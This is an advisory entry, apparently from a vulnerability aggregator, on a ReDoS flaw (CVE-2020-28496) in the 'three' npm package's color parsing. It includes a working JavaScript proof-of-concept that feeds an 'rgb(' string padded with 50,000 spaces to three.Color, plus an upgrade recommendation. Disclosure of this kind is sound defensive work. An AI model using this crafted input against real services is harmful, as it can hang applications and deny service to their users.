Lucene search
AnonymousNODEJS:1639HistoryMar 01, 2021 - 8:02 p.m.
Regular Expression Denial of Service
2021-03-0120:02:32
Anonymous
www.npmjs.com
25
0.003 Low
EPSS
Percentile
70.5%
Overview
three before version 0.125.0 is vulnerable to Regular Expression Denial of Service (ReDoS). This can happen when handling rgb or hsl colors.
POC
var three = require('three')
function build_blank (n) {
var ret = "rgb("
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")
Recommendation
Upgrade to version 0.125.0 or later
References
Related
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2021-02-19 04:06:02
prion
prion
Design/Logic Flaw
2021-02-18 15:15:00
cve
cve
CVE-2020-28496
2021-02-18 15:15:13
cvelist
cvelist
CVE-2020-28496 Regular Expression Denial of Service (ReDoS)
2021-02-18 00:00:00
osv
osv
Denial of service in three
2021-03-01 19:57:16
nvd
nvd
CVE-2020-28496
2021-02-18 15:15:13
debiancve
debiancve
CVE-2020-28496
2021-02-18 15:15:13
ubuntucve
ubuntucve
CVE-2020-28496
2021-02-18 00:00:00
github
github
Denial of service in three
2021-03-01 19:57:16